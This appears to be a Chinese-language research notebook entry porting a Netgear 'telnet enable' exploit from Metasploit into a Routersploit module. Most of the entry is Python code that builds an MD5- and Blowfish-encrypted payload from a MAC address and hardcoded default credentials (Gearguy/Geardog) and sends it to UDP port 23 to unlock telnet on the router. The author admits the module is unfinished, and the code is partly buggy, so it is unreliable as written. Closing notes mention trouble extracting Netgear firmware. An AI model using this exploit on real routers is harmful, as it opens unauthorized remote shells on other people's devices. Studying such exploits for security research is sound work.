# PoC on Routersploit 要自己import一個poc，所以我就上一下metasploit trace了一下code,然後希望可以把本來寫在metasploit的東西寫在routersploit的架構上。 先來看一下我參考之後寫的code: ```python= from routersploit.core.exploit import * from routersploit.core.http.http_client import HTTPClient import sys import socket import array from optparse import OptionParser from Crypto.Cipher import Blowfish from Crypto.Hash import MD5 TELNET_PORT = 23 class Exploit(HTTPClient): __info__ = { "name": "test", "description": "test test", "authors": "Aihcer", "devices": "Netgear系列", } ip = OptIP("", "Target IPv4 or IPv6 address") port = OptPort(23, "Target HTTP port") username = OptString("Gearguy", "Username to login") password = OptString("Geardog", "Password to login") def run(self): print("run") mac = "00:40:5E:21:14:4E" # eventually reformat mac mac = mac.replace(":","").upper() # Pad the input correctly assert(len(mac) < 0x10) just_mac = mac.ljust(0x10, "\x00") assert(len(username) <= 0x10) just_username = username.ljust(0x10, "\x00") assert(len(password) <= 0x21) just_password = password.ljust(0x21, "\x00") cleartext = (just_mac + just_username + just_password).ljust(0x70, '\x00') md5_key = MD5.new(cleartext).digest() data = (md5_key + cleartext).ljust(0x80, "\x00") a = array.array('i') if(a.itemsize < 4): a = array.array('L') if(a.itemsize != 4): print ("Need a type that is 4 bytes on your platform so we can fix the data!") exit(1) a.fromstring(data) a.byteswap() payload = a.toString() secret_key = "AMBIT_TELNET_ENABLE+" + password #return ByteSwap(Blowfish.new(secret_key, 1).encrypt(payload)) data2 = Blowfish.new(secret_key, 1).encrypt(payload) b = array.array('i') if(b.itemsize < 4): b = array.array('L') if(b.itemsize != 4): print ("Need a type that is 4 bytes on your platform so we can fix the data!") exit(1) b.fromstring(data2) b.byteswap() payload = b.toString() #SendPayload(ip, payload) for res in socket.getaddrinfo(ip, TELNET_PORT, socket.AF_INET, socket.SOCK_DGRAM,socket.IPPROTO_IP): af, socktype, proto, canonname, sa = res try: s = socket.socket(af, socktype, proto) except socket.error as msg: s = None continue try: s.connect(sa) except socket.error as msg: s.close() s= None continue break if s is None: print ("Could not connect to '%s:%d'" % (ip, TELNET_PORT)) else: s.send(payload) s.close() print ("Sent telnet enable payload to '%s:%d'" % (ip, TELNET_PORT)) def execute(self, cmd): print("execute") ``` 基本上還有一些bug，但是大致上是這樣，我再把他們修一下，應該就可以run起來了，然後其中有一些routersploit這個framewolk提供的功能我還沒有搞懂他們之間的api是怎麼用，接下來這個禮拜想要再追追看。 然後也可以提一下，netgear的firmware我有一點搞不定，他們給的chk檔好像是更新檔，所以不是一整個完整的firmware,這樣的話在extract的時候就沒有辦法拿到所有想要的東西。